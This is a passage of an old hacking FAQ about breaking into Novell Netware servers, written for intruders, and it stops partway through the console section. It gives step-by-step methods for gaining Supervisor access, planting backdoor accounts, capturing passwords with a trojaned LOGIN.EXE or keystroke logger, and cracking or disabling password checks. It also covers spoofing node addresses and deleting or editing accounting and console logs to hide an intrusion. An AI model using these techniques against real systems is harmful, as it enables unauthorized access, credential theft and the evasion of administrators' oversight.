Frequently Asked Questions About Hacking Novell Netware "The Unofficial Netware Hack FAQ" Beta Version 4 Compiled by Simple Nomad Contributions (and thanks to): The LAN God Teiwaz teiwaz@wolfe.net Fauzan Mirza fauzan@dcs.rhbnc.ac.uk Jeff Carr jcarr@kpmg.com.au David A Wagner daw@lagos.CS.Berkeley.EDU Diceman diceman@fl.net.au PEME_Inc Craig craigt@online1.magnus1.com Extra thanks to Al Payne for keeping an HTML version of the FAQ up on the net. And hello to several friends - Mr. Wizard, The Raven, Route, B.C. And thanks to many others who requested anonymity or didn't realize they were contributing ;-) Tech Support (and special thanks to): itsme - infamous Netware Netherlands hack fame Greg Miller - Programmer/Analyst (home page in the Resources section) A big update is that I've adding the Windows 95 info I've collected. I cannot vouch for it's accuracy at all, as I do not use Windows 95. All the stuff I've included came from two different sources minimum for each one. As always, send me the corrections or updates for this or anything else -- you always do ;-) Greg and I exchange a lot of e-mail and the new Mathematical/Theoretical section grew out of that. Almost all of it is Greg's ideas, and it should prove to be the most controversial section in the FAQ ;-) --------------------------------------------------------------------------- --------------------------------------------------------------------------- Contents U means update from last FAQ, N means new. --------------------------------------------------------------------------- Section 00 General Info 00-1. What is this "FAQ" for? 00-2. What is the origin of this FAQ and how do I add to it? 00-3. Is this FAQ available by anonymous FTP or WWW? --------------------------------------------------------------------------- Section 01 Access to Accounts U 01-1. What are common accounts and passwords in Novell Netware? 01-2. How can I figure out valid account names on Novell Netware? 01-3. What is the "secret" method to gain Supervisor access Novell used to teach in CNE classes? 01-4. What is the cheesy way to get Supervisor access? 01-5. How do I leave a backdoor? 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access? --------------------------------------------------------------------------- Section 02 Passwords 02-1. How do I access the password file in Novell Netware? 02-2. How do I crack Novell Netware passwords? U 02-3. What is a "brute force" password cracker? 02-4. What is a "dictionary" password cracker? 02-5. How do I use SETPWD.NLM? U 02-6. What's the "debug" way to disable passwords? 02-7. Exactly how do passwords get encrypted? N 02-8. What are the dangers of "storing" captured passwords? --------------------------------------------------------------------------- Section 03 Accounting and Account Security 03-1. What is Accounting? 03-2. How do I defeat Accounting? 03-3. What is Intruder Detection? 03-4. How do I check for Intruder Detection? 03-5. What are station/time restrictions? 03-6. How do I spoof my node or IP address? --------------------------------------------------------------------------- Section 04 The Console 04-1. How do I defeat console logging? U 04-2. Can I set the RCONSOLE password to work for just Supervisor? U 04-3. How can I get around a locked MONITOR? --------------------------------------------------------------------------- Section 05 File and Directory Access 05-1. How can I see hidden files and directories? 05-2. How do I defeat the execute-only flag? 05-3. How can I hide my presence after altering files? 05-4. What is a Netware-aware trojan? 05-5. What are Trustee Directory Assignments? U 05-6. Are there any default Trustee Assignments that can be exploited? 05-7. What are some general ways to exploit Trustee Rights? 05-8. Can access to .NCF files help me? N 05-9. Can someone think they've logged out and I walk up and take over? N 05-10. What other Novell and third party programs have holes that give "too much access"? N 05-11. How can I get around disk space requirements? --------------------------------------------------------------------------- Section 06 Fun with Netware 4.1 06-1. What is interesting about Netware 4.x's licensing? U 06-2. How can I tell if something is being Audited? 06-3. Where are the Login Scripts stored and can I edit them? 06-4. What is the rumored "backdoor" in NDS? 06-5. How can I remove NDS? 06-6. How can I remove Auditing if I lost the Audit password? 06-7. Does 4.x store the LOGIN password to a temporary file? 06-8. Everyone can make themselves equivalent to anyone including Admin. How? U 06-9. Can I reset an NDS password with just limited rights? 06-10. What is OS2NT.NLM? 06-11. Do you have to be Admin equivalent to reset a password? N 06-12. What if I can't see SYS:_NETWARE? N 06-13. What are security considerations regarding partitions of the tree? --------------------------------------------------------------------------- Section 07 Miscellaneous Info on Netware 07-1. Why can't I get through the 3.x server to another network via TCP/IP? 07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? 07-3. How can I login without running the System Login Script? 07-4. How do I remotely reboot a Netware 3.x file server? U 07-5. How can I abend a Netware server? And why? U 07-6. What is Netware NFS and is it secure? 07-7. Can sniffing packets help me break in? 07-8. What else can sniffing get me? 07-9. How does password encryption work? U 07-10. Are there products to help improve Netware's security? 07-11. What is Packet Signature and how do I get around it? 07-12. Do any Netware utilities have holes like Unix utilities? --------------------------------------------------------------------------- Section 08 Netware and Windows 95 N 08-1. Will Windows 95 cause server problems for Netware? N 08-2. Will Windows 95 cause network problems for Netware? N 08-3. What's with Windows 95 and Netware passwords? N 08-4. Can Windows 95 bypass NetWare user security? --------------------------------------------------------------------------- Section 09 Resources U 09-1. What are some Netware FTP locations? U 09-2. What are some Netware WWW locations? 09-3. What are some Netware USENET groups? U 09-4. What are some Netware mailing lists? 09-5. Where are some other Netware FAQs? 09-6. Where can I get the files mentioned in this FAQ? --------------------------------------------------------------------------- Section 10 Netware APIs 10-1. Where can I get the Netware APIs? 10-2. Are there alternatives to Netware's APIs? --------------------------------------------------------------------------- Section 11 Mathematical/Theoretical N 11-1. How does the whole password/login/encryption thing work? N 11-2. Are "man in the middle" attacks possible? N 11-3. Are Netware-aware viruses possible? N 11-4. Can a trojaned LOGIN.EXE be inserted during the login process? --------------------------------------------------------------------------- Section 12 For Administrators Only 12-1. How do I secure my server? U 12-2. I'm an idiot. Exactly how do hackers get in? 12-3. I have xxx setup and xxx version running. Am I secure? --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 01 Access to Accounts --------------------------------------------------------------------------- 01-1. What are common accounts and passwords in Novell Netware? Out of the box Novell Netware has the following default accounts - SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All of these have no password to start with. Virtually every installer quickly gives SUPERVISOR and ADMIN a password. However, many locations will create special purpose accounts that have easy-to-guess names, some with no passwords. Here are a few and their typical purposes: Account Purpose ---------- ------------------------------------------------------ PRINT Attaching to a second server for printing LASER Attaching to a second server for printing HPLASER Attaching to a second server for printing PRINTER Attaching to a second server for printing LASERWRITER Attaching to a second server for printing POST Attaching to a second server for email MAIL Attaching to a second server for email GATEWAY Attaching a gateway machine to the server GATE Attaching a gateway machine to the server ROUTER Attaching an email router to the server BACKUP May have password/station restrictions (see below), used for backing up the server to a tape unit attached to a workstation. For complete backups, Supervisor equivalence is required. WANGTEK See BACKUP FAX Attaching a dedicated fax modem unit to the network FAXUSER Attaching a dedicated fax modem unit to the network FAXWORKS Attaching a dedicated fax modem unit to the network TEST A test user account for temp use ARCHIVIST Palidrome default account for backup CHEY_ARCHSVR An account for Arcserve to login to the server from from the console for tape backup. Version 5.01g's password was WONDERLAND. Delete the Station Restrictions and use SUPER.EXE to toggle this account and you have an excellent backdoor. WINDOWS_PASSTHRU Although not required, per the Microsoft Win95 Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you need this for resource sharing without a password. ROOT Found on Shiva LanRovers, gets you the command-line equiv of the AdminGUI. By default, no password. A lot admins just use the AdminGUI and never set up a password. This should give you an idea of accounts to try if you have access to a machine that attaches to the server. A way to "hide" yourself is to give GUEST or USER_TEMPLATE a password. Occassionally admins will check up on GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about USER_TEMPLATE until itsme reminded me. This list is also a good starting point for account names for "backdoors". In some environments these account names will be left alone, particularly in large companies, especially Netware 4.x sites with huge trees. And don't forget account names like Alt-255 or NOT-LOGGED-IN. --------------------------------------------------------------------------- 01-2. How can I figure out valid account names on Novell Netware? Any limited account should have enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter. Now go to User Information and you will see a list of all defined accounts. You will not get much info with a limited account, but you can get the account and the user's full name. If your in with any valid account, you can run USERLST.EXE and get a list of all valid account names on the server. If you don't have access (maybe the sys admin deleted the GUEST account, a fairly common practice), you can't just try any account name at the LOGIN prompt. It will ask you for a password whether the account name is valid or not, and if it is valid and you guees the wrong password, you could be letting the world know what you're up to if Intruder Detection is on. But there is a way to determine if an account is valid. From a DOS prompt use a local copy (on your handy floppy you carry everywhere) of MAP.EXE. After you've loaded the Netware TSRs up through NETX or VLM, Try to map a drive using the server name and volume SYS:. For example: MAP G:=TARGET_SERVER/SYS:APPS <enter> Since you are not logged in, you will be prompted for a login ID. If it is a valid ID, you will be prompted for a password. If not, you will immediately receive an error. Of course, if there is no password for the ID you use you will be attached and mapped to the server. You can do the same thing with ATTACH.EXE: ATTACH TARGET_SERVER/loginidtotry <enter> The same thing will happen as the MAP command. If valid, you will be prompted for a password. If not, you get an error. Another program to check for valid users and the presence of a password is CHKNULL.EXE by itsme. This program checks for users and whether they have a password assigned. In 4.1 CHKNULL shows you every account with no password and you do not have to be logged in. For this to work bindery emulation must be on. But there is another way to get them in 4.1: Once you load up the VLMs you may be able to view the entire tree, or at least all of the tree you could see if logged in. Try this: CX /T /A /R During the installation of 4.1, [Public] has browse access to the entire tree because [Public] is added to [Root] as a Trustee. The Inherited Rights Filter flows this stuff down unless explicitly blocked. If you have the VLMs loaded and access to CX, you don't even have to log in, and you can get the name of virtually every account on the server. --------------------------------------------------------------------------- 01-3. What is the "secret" method to gain Supervisor access Novell used to teach in CNE classes? Before I start this section, let me recommend another solution, my God, ANY other solution is better than this! If you are running 3.x, jump to the end of this section. The secret method is the method of using a DOS-based sector editor to edit the entry in the FAT, and reset the bindery to default upon server reboot. This gives you Supervisor and Guest with no passwords. The method was taught in case you lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed. While you get a variety of answers from Novell about this technique, from it doesn't work to it is technically impossible, truth be it it can be done. Here are the steps, as quoted from comp.os.netware.security, with my comments in [brackets]: [start of quote] A Netware Server is supposed to be a very safe place to keep your files. Only people with the right password will have access to the data stored there. The Supervisor (or Admin) user's password is usually the most well kept secret in the company, since anyone that has that code could simply log to the server and do anything he/she wants. But what happens if this password is lost and there's no user that is security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process, see section 02-3 - S.N.] What happens if the password system is somehow damaged and no one can log to the network? According to the manual, there's simply no way out. You would have to reinstall the server and try to find your most recent backup. Fortunately, there is a very interesting way to gain complete access to a Netware server without knowing the Supervisor's (or Admin's) password. You may imagine that you would have to learn complex decryption techniques or even type in a long C program, but that's not the case. The trick is so simple and generic that it will work the same way for Netware 2.x, 3.x and 4.x. The idea is to fool Netware to think that you have just installed the server and that no security system has been estabilished yet. Just after a Netware 2.x or 3.x server is installed, the Supervisor's password is null and you can log in with no restriction. Netware 4.x works slightly differently, but it also allows anyone to log in after the initial installation, since the installer is asked to enter a password for the Admin user. But how can you make the server think it has just been installed without actually reinstalling the server and losing all data on the disk? Simple. You just delete the files that contain the security system. In Netware 2.x, all security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS). Netware 3.x stores that information in three files (NET$OBJ.SYS, NET$VAL.SYS and NET$PROP.SYS). The all new Netware 4.x system stores all login names and passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS and UNINSTAL.NDS [This last file may not be there, don't worry - S.N.]). One last question remains. How can we delete these files if we don't have access to the network, anyway? The answer is, again, simple. Altough the people from Novell did a very good job encrypting passwords, they let all directory information easy to find and change if you can access the server's disk directly, using common utilities like Norton's Disk Edit. Using this utility as an example, I'll give a step-by-step procedure to make these files vanish. All you need is a bootable DOS disk, Norton Utilities' Emergency Disk containing the DiskEdit program and some time near the server. 1. Boot the server and go to the DOS prompt. To do this, just let the network boot normally and then use the DOWN and EXIT commands. This procedure does not work on old Netware 2.x servers and in some installations where DOS has been removed from memory. In those cases, you'll have to use a DOS bootable disk. 2. Run Norton's DiskEdit utility from drive A: 3. Select "Tools" in the main menu and then select "Configuration". At the configuration window, uncheck the "Read-Only" checkbox. And be very careful with everything you type after this point. 4. Select "Object" and then "Drive". At the window, select the C: drive and make sure you check the button "physical drive". After that, you'll be looking at your physical disk and you be able to see (and change) everything on it. 5. Select "Tools" and then "Find". Here, you'll enter the name of the file you are trying to find. Use "NET$BIND" for Netware 2, "NET$PROP.SYS" for Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find these strings in a place that is not the Netware directory. If the file names are not all near each other and proportionaly separated by some unreadable codes (at least 32 bytes between them), then you it's not the place we are looking for. In that case, you'll have to keep searching by selecting "Tools" and then "Find again". [In Netware 3.x, you can change all occurences of the bindery files and it should still work okay, I've done it before. - S.N.] 6. You found the directory and you are ready to change it. Instead of deleting the files, you'll be renaming them. This will avoid problems with the directory structure (like lost FAT chains). Just type "OLD" over the existing "SYS" or "NDS" extension. Be extremely careful and don't change anything else. 7. Select "Tools" and then "Find again". Since Netware store the directory information in two different places, you have to find the other copy and change it the same way. This will again prevent directory structure problems. 8. Exit Norton Disk Edit and boot the server again. If you're running Netware 2 or 3, your server would be already accessible. Just go to any station and log in as user Supervisor. No password will be asked. If you're running Netware 4, there is one last step. 9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt) and select the options to install the Directory Services. You be prompted for the Admin password while doing this. After that, you may go to any station and log in as user Admin, using the password that you have selected. What I did with Norton's Disk Edit could be done with any disk editing utility with a "Search" feature. This trick has helped me save many network supervisors in the last years. I would just like to remind you that no one should break into a netware server unless authorized to do it by the company that owns the server. But you problably know that already. [end of quote] I actually had this typed up but kept changing it, so I stole this quote from the newsgroup to save me retyping ;-) Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and downs the server. Reboot and you have Supe and Guest, no password. --------------------------------------------------------------------------- 01-4. What is the cheesy way to get Supervisor access? The cheesy way is the way that will get you in, but it will be obvious to the server's admin that the server has been compromised. This technique works for 3.11. Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account on the server is made a supe equivalent, and 3) the sys admin is going to know very quickly something is wrong. What the admin will do is remove the supe rights from all accounts that are not supposed to have it and change the Supervisor password back. The only thing you can do is leave a backdoor for yourself (see next question). --------------------------------------------------------------------------- 01-5. How do I leave a backdoor? Once you are in, you want to leave a way back with supe equivalency. You can use SUPER.EXE, written for the express purpose of allowing the non-supe user to toggle on and off supe equivalency. If you use the cheesy way in (previous question), you turn on the toggle before the admin removes your supe equivalency. If you gain access to a supe equivalent account, give Guest supe equivalency and then login as Guest and toggle it on. Now get back in as the original supe account and remove the supe equivalency. Now Guest can toggle on supe equivalency whenever it's convenient. Of course Guest doesn't have to be used, it could be another account, like an account used for e-mail administration or an e-mail router, a gateway's account, you get the idea. Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix will give away that an account has been altered at the bindery level, but the only way for an admin to clear the error is to delete and rebuild the account. Another backdoor is outlined in section 02-2 regarding the replacement LOGIN.EXE and PROP.EXE --------------------------------------------------------------------------- 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access? If you have two volumes or some unallocated disk space you can use this hack to get Supe. Of course you need physical access but it works. I got this from a post in comp.os.security.netware - Dismount all volumes - Rename SYS: to SYSOLD: - Rename VOL1: (or what ever) to SYS: or create new SYS: on new disk - Reboot server - Mount SYS: and SYSOLD: - Attach to server as Supervisor (Note: login not available) - Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD - Dismount volumes - Rename volume back to correct names - Reboot server - Login as Supervisor, no password due to new bindery - Run BINDREST - You are currently logged in as Supe, you can create a new user as Supe equiv and use this new user to reset Supe's password, whatever. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 02 Passwords --------------------------------------------------------------------------- 02-1. How do I access the password file in Novell Netware? Contrary to not-so-popular belief, access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows: Netware version File Names --------------- ---------- 2.x NET$BIND.SYS, NET$BVAL.SYS 3.x NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located in 2.x and 3.x respectively. In Netware 4.x, the files are physically located in a different location than on the SYS: volume. However, by using the RCONSOLE utility and using the Scan Directory option, you can see the files in SYS:_NETWARE: File What it is -------------- -------------------------- VALUE.NDS Part of NDS BLOCK.NDS Part of NDS ENTRY.NDS Part of NDS PARTITIO.NDS Type of NDS partition (replica, master, etc.) MLS.000 License VALLINCEN.DAT License validation Here is another way to view these files, and potentially edit them. After installing NW4 on a NW3 volume, reboot the server with a 3.x SERVER.EXE. On volume SYS will be the _NETWARE directory. SYS:_NETWARE is hidden better on 4.1 than 4.0x, but in 4.1 you can still see the files by scanning directory entry numbers using NCP calls (you need the APIs for this) using function 0x17 subfunction 0xF3. --------------------------------------------------------------------------- 02-2. How do I crack Novell Netware passwords? There are a few ways to approach this. First, we'll assume Intruder Detection is turned off. We'll also assume unencrypted passwords are allowed. Hopefully you won't have to deal with packet signature (see 07-11) Then we'll assume you have access to the console. Finally we'll assume you can plant some kind of password catcher. Access to a sniffer might help. These are a lot of ifs. If Intruder Detection is off, you can use a "brute force" password cracker. See section 02-4 for details. Encrypted passwords is Novell's way of protecting passwords from sniffers. Since older versions of Netware (2.15c) sent passwords as plain text over the wire, a sniffer could see the password as it went by. To secure things, Novell gave the administrator a way to control this. Later versions of the LOGIN.EXE program would encrypt the password before transmitting it across the wire to the server. But before this could happen, the shell (NETX) had to be updated. Since some locations had to have older shells and older versions of LOGIN.EXE to support older equipment, the administrator has the option of allowing unencrypted passwords to access the server. This is done by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping the server console every attempt! Fortunately most sites turn this switch on to support some old device. If you have access to the console, either by standing in front of it or by RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords. Just load the NLM and pass it command line parameters: NLM Account(s) reset Netware version(s) supported ------------ ----------------- ---------------------------- SETSPASS.NLM SUPERVISOR 3.x SETSPWD.NLM SUPERVISOR 3.x, 4.x SETPWD.NLM any valid account 3.x, 4.x See 02-5 for more SETPWD.NLM info. If you can plant a password catcher or keystroke reader, you can get them this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and normally you will not have access to put a file in that directory. The best place to put a keystroke capture program is in the workstation's path, with the ATTRIB set as hidden. The advantage is that you'll get the password and Netware won't know you swiped it. The disadvantage is getting access to the machine to do this. The very best place to put one of these capture programs is on a common machine, like a pcAnywhere box, which is used for remote access. Many locations will allow pcAnywhere access to a machine with virtually no software on it, and control security access to the LAN by using Netware's security features. Uploading a keystroke capture program to a machine like this defeats this. If the system is being backed up via a workstation, this can be used as a good entry point. These workstations have to have supe equiv to back up the bindery and other system files. If you can access this workstation or use the backup systems user account name then you can get supe level login. itsme, the notorious Netherlands Netware hacker, developed KNOCK.EXE by rewriting one byte of ATTACH.EXE to try without a password to get into a server. KNOCK.EXE utilitzes a bug that allows a non-password attach to get in. This works on versions of Netware earlier than 2.2, and 3.11. Later versions have the bug fixed. Given enough time you will get in. Another alternative is the replacement LOGIN.EXE by itsme. This jewel, coupled with PROP.EXE, will create a separate property in the bindery on a 2.x or 3.x server that contains the passwords. Here is the steps to use these powerful tools: - Gain access to a workstation logged in as Supervisor or equivalent (or use another technique described elsewhere for getting this type of access) - Run the PROP.EXE file with a -C option. This creates the new property for each bindery object. Remember, you must be a Supe for this step. - Replace the LOGIN.EXE in the SYS:LOGIN directory with itsme's. Be sure to flag it SRO once replaced. - Now it is set. Keep PROP.EXE on a floppy, and check the server with any valid login, Supervisor or not, after a week or two. - To check the passwords captured, type PROP -R after your logged in. You can redirect it to a file or printer. A list of accounts and passwords, valid and working, are yours. - Don't forget to hide your presence! See section 05-3 for details. --------------------------------------------------------------------------- 02-3. What is a "brute force" password cracker? If Intruder Detection is off, you can just guess the password until you get it. This can be automated by using a program that continually guesses passwords, known as a "brute force" password cracker. One program that does this is NOVELBFH.EXE (for version 3.x only). This program will try passwords like aa, ab, ac and so on until every legal character combination has been tried. You will eventually get the password. However this assumes you have 1) a lot of time since it takes a second or two for each try (more on a dial-up link), and 2) access to a machine that will run one of these programs for hours, even days. And if Intruder Detection is on you will be beeping the System Console every couple of seconds and time-stamping your node address to the File Server Error Log. For brute-force attacking old bindery files, there is a program called CRACK. This program works on Netware 3.x and can be found at http://www.mechnet.liv.ac.uk/~roy/freeware.html I have not tried this program personally, but have heard of good results from others. --------------------------------------------------------------------------- 02-4. What is a "dictionary" password cracker? For a password cracker that works against a single account and uses a dictionary wordlist, try NWPCRACK.EXE by Teiwaz. You must supply a dictionary wordlist (see the alt.2600/#hack FAQ for FTP sites with wordlists), and you are subject to the same limitations as NOVELBFH (no Intruder Detection, 3.x only) but it works great. For a password cracker that works directly against either the .OLD bindery files left over after a BINDFIX or even a live bindery, look for BINDERY.ZIP. This ZIP contains BINDERY.EXE which will, among other things, extract user information out of bindery files into a Unix-style password text file. Then you can use BINCRACK.EXE from the same ZIP to "crack" the extracted text file. BINCRACK.EXE, like NWPCRACK.EXE, requires a word list. BINCRACK.EXE is extremely fast. One interesting thing, the BINDERY.ZIP file also contains versions of BINCRACK for Solaris 1 and Solaris 2, so you can copy that extracted user info to a Sparc and do lightning-quick cracks. For checking existing passwords for guessability, see section 07-9. --------------------------------------------------------------------------- 02-5. How do I use SETPWD.NLM? You can load SETPWD at the console or via RCONSOLE. If you use RCONSOLE, use the Transfer Files To Server option and put the file in SYS:SYSTEM. For 3.x: LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword] For 4.x: set bindery context = [context, e.g. hack.corp.us] LOAD [path if not in SYS:SYSTEM]SETPWD [username] [newpassword] In 4.x the change is replicated so you have access to all the other servers in the tree. And don't forget, you must follow the password requirements in SYSCON for this to work. That is, if the account you are changing normally requires a 6 character password, then you'll need to supply a 6 character password. --------------------------------------------------------------------------- 02-6. What's the "debug" way to disable passwords? You must be at the console to do this: <left-shift><right-shift><alt><esc> Enters Debugger type "d VerifyPassword 6" Write down 6 byte response for later use type "c Verifypassword=B8 0 0 0 0 C3" Sets system to turn off pword checks type "g" To make the system change and drop you back into the console to turn password checking back on... <left-shift><right-shift><alt><esc> Enters Debugger type "c VerifyPassword= xx xx xx xx xx xx" Where xx's are the previous recorded numbers that where written down. type "g" To make system changes and drop you back to into the console Teiwaz updated these steps to make things easier and workable. And one other note -- this will NOT disable password checking in 4.x. Sorry.... --------------------------------------------------------------------------- 02-7. Exactly how do passwords get encrypted? The algorithm for 3.x and 4.x is, according to some sources, the same. It is a proprietary algorithm that is supposed to be one-way. The following is a description of the source code located at the dutiws.twi.tudelft.nl site in the /pub/novell directory. The code was posted by Fauzan Mirza on sci.crypt for discussion, and produced the following bit-by-bit description in comp.os.netware.security by David Wagner (I've removed most of the flame comments): encryptp(int id[4], char password[]) char buffer[32]; concatenate password[] to itself until its at least 32 bytes long put the result in buffer[] concatenate id[] to itself until its at least 32 bytes long xor the result into buffer[] return encrypt(buffer[]) encrypt(char buf[32]) nibble output[32]; /* a nibble = 4 bits = half a byte */ apply some complicated (but easily reversible!) function to buf[] for (i=0; i<32; i++) output[i] = S-box[buf[i]]; return output[] /* a 16 byte return value */ where the S-box[] crunches 8 bit values down to 4 bit values. So here's how to invert the password hash function, given the 16 byte hash output[] value: for (i=0; i<32; i++) pick any x such that S-box[x] == output[i] /* this is easy */ buf[i] = x apply the reverse of the complicated function to buf[] concatenate id[] to itself..., and xor the result into buf[] use the resulting 32 byte buf[] as the inverse password Of course, there are several nitpicking details which I've left out: if you're actually writing the inversion program, you have to make sure to take care of the details, but they only make the programming more complicated, they don't make the inversion process any slower once the program is written. Also, there is the fact that the inverse password will include full 8-bit values, not just ASCII alphanumerics. Once could try to be a bit more sophisticated to ensure you get an inverse which is alphanumeric. I haven't bothered to think about this case too much -- it doesn't seem to be worth the neurotransmitters. The reason you don't get the "true" "original" password is because when you pick 'x' above, you can't know which 'x' was the "true" "original" value, since the S-boxes throw away information. --------------------------------------------------------------------------- 02-8. What are the dangers of "storing" captured passwords? There are several, I'm sure you can think of more. - If the admin finds them online, they will obviously know something is up especially if it's under your account. - If another user on the system realizes what you're doing, they could possibly exploit other user's accounts (in an unsave manner) and tip off the admin that something is up. - With something like itsme's LOGIN/PROP utility, there's the chance that YOUR password will get stored in the file, thus allowing anyone who realizes what's up to use your account with virutally no effort on their part. This is especially dangerous when the admin is playing around with LOGIN/PROP because they want to see "how it works". - Another user might realize what's up, and may be able to provide enough evidence to prove that it's you doing it. Had some other user previously found the file, and exploited accounts (and caused damage), you would likely be blamed for it. Therefore it is recommended that passwords are encrypted, preferably using something halfway secure (XOR is not encryption). --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 03 Accounting and Account Security --------------------------------------------------------------------------- 03-1. What is Accounting? Accounting is Novell's pain in the butt way to control and manage access to the server in a way that is "accountable". The admin set up charge rates for blocks read and written, service requests, connect time, and disk storage. The account "pays" for the service by being given some number, and the accounting server deduces for these items. How the account actually pays for these items (departmental billing, cash, whatever) you may or may not want to know about, but the fact that it could be installed could leave a footprint that you've been there. Any valid account, including non-supe accounts, can check to see if Accounting is turned on. Simply run SYSCON and try to access Accounting, if you get a message that Accounting is not installed, then guess what? Since it is a pain to administer, many sys admins will turn it on simply to time-stamp each login and logout, track intruders, and include the node address and account name of each of these items. --------------------------------------------------------------------------- 03-2. How do I defeat Accounting? Turn it off. And spoof your node address. Here's the steps - - Spoof your address (see 03-6). Use a supe account's typical node address as your own. - If you are using a backdoor, activate it with SUPER.EXE. - Delete Accounting by running SYSCON, selecting Accounting, Accounting Servers, hitting the delete key, and answering yes when asked if you wish to delete accounting. The last entry in the NET$ACCT.DAT file will be your login time-stamped with the spoofed node address. - Now do what you will in the system. Use a different account if you like, it won't show up in the log file. - When done, login with the original account, run SYSCON and re-install Accounting. Immediately logout, and the next line in the NET$ACCT.DAT file will be your logout, showing a login and logout with the same account name, nice and neat. If you can't spoof the address (some LAN cards don't allow it or require extra drivers you may not have), just turn off Accounting and leave it off or delete the NET$ACCT.DAT file located in the SYS:SYSTEM directory. It should be noted that to turn off and on Accounting you need supe equivalent, but you don't need supe equivalence to spoof the address. --------------------------------------------------------------------------- 03-3. What is Intruder Detection? Intruder Detection is Novell's way of tracking invalid password attempts. While this feature is turned off by default, most sites practicing any type of security will at minimum turn this feature on. There are several parameters to Intruder Detection. First, there is a setting for how long the server will remember a bad password attempt. Typically this is set to 30 minutes, but can be as short as 10 minutes of as long as 7 days. Then there is a setting for how many attempts will lockout the account. This is usually 3 attempts, but can be as short as 1 or as many as 7. Finally is the length the account is locked out. The default is 30 minutes but it can range from 10 minutes to 7 days. When an Intruder Detection occurs, the server beeps and a time-stamped message is displayed on the System Console with the account name that is now locked out and the node address from where to attempt came from. This is also written to the File Server Error Log. A Supervisor or equivalent can unlock the account before it frees itself up, and the File Server Error Log can also be erased by a Supervisor or equivalent. In a large shop, it is not unusual to see Intruder Lockouts even on a daily basis, and forgetting a password is a typical regular-user thing to do. Intruder Lockouts on Supervisor or equivalent account is usually noticed. --------------------------------------------------------------------------- 03-4. How do I check for Intruder Detection? The easiest way to check for Intruder Detection is to play with a valid account that you know the password of. Try the wrong password several times. If Intruder Detection is on, the account will be locked out once you try to get back in with the correct password. --------------------------------------------------------------------------- 03-5. What are station/time restrictions? Time restrictions can be placed on an account to limit the times in which an account can be logged in. In the account is already logged in and the time changes to a restricted time, the account is logged out. The restriction can be per weekday down to the half hour. That means that if an admin wants to restrict an account from logging in except on Monday through Friday from 8-5, it can be done. Only Supervisor and equivalents can alter time restrictions. Altering the time at the workstation will not get you around time restrictions, only altering time at the server can change the ability to access. Station restriction place a restriction on _where_ an account can be used. Restrictions can be to a specific token ring or ethernet segment, and can be specific down to the MAC layer address, or node address. The only way around a station restriction at the node address is to spoof the address from a workstation on the same segment or ring as the address you are spoofing. Like time restrictions, only Supervisor and equivalents can alter station restrictions. Of course you can remove station and time restrictions in SYSCON if you are a Supe equivalent. --------------------------------------------------------------------------- 03-6. How do I spoof my node or IP address? This will depend greatly on what kind of network interface card (NIC) the workstation has, as to whether you can perform this function. Typically you can do it in the Link Driver section of the NET.CFG file by adding the following line - NODE ADDRESS xxxxxxxxxxxx where xxxxxxxxxxxx is the 12 digit MAC layer address. This assumes you are using Netware's ODI drivers, if you are using NDIS drivers you will have to add the line to a PROTOCOL.INI or IBMENII.NIF file, which usually has the lines already in it. For an IP address, you may have to run a TCPIP config program to make it work (it depends on whose IP stack you are running). Some implementations will have the mask, the default router and the IP address in the NET.CFG, some in the TCPIP.CFG. It is a good idea to look around in all network- related subdirectories to see if there are any .CFG, .INI, or .NIF files that may contain addresses. Getting the target node address should be pretty easy. Login with any account and do a USERLIST /A. This will list all accounts currently logged in with their network and node address. If your workstation is on the same network as the target, you can spoof the address no problem. Actually you can spoof the address regardless but to defeat station restrictions you must be on the same network. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 04 The Console --------------------------------------------------------------------------- 04-1. How do I defeat console logging? Here you need console and Supervisor access. The site is running 3.11 or higher and running the CONLOG.NLM. Any site running this is trapping all console messages to a file. If you run SETPWD at the console, the response by SETPWD is written to a log file. Here's the steps for determining if it is running and what to do to defeat it: - Type MODULES at the console. Look for the CONLOG.NLM. If it's there, it's running. - Look on the server in SYS:ETC for a file called CONSOLE.LOG. This is a plain text file that you can type out. However you cannot delete or edit it while CONLOG is running. - Unload CONLOG at the console. - Delete, or even better yet, edit the CONSOLE.LOG file, erasing your tracks. - Reload CONLOG. It will show that is has been restarted in the log. - Check the CONSOLE.LOG file to ensure the owner has not changed. - Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG that your editor have left to be salvaged. --------------------------------------------------------------------------- 04-2. Can I set the RCONSOLE password to work for just Supervisor? 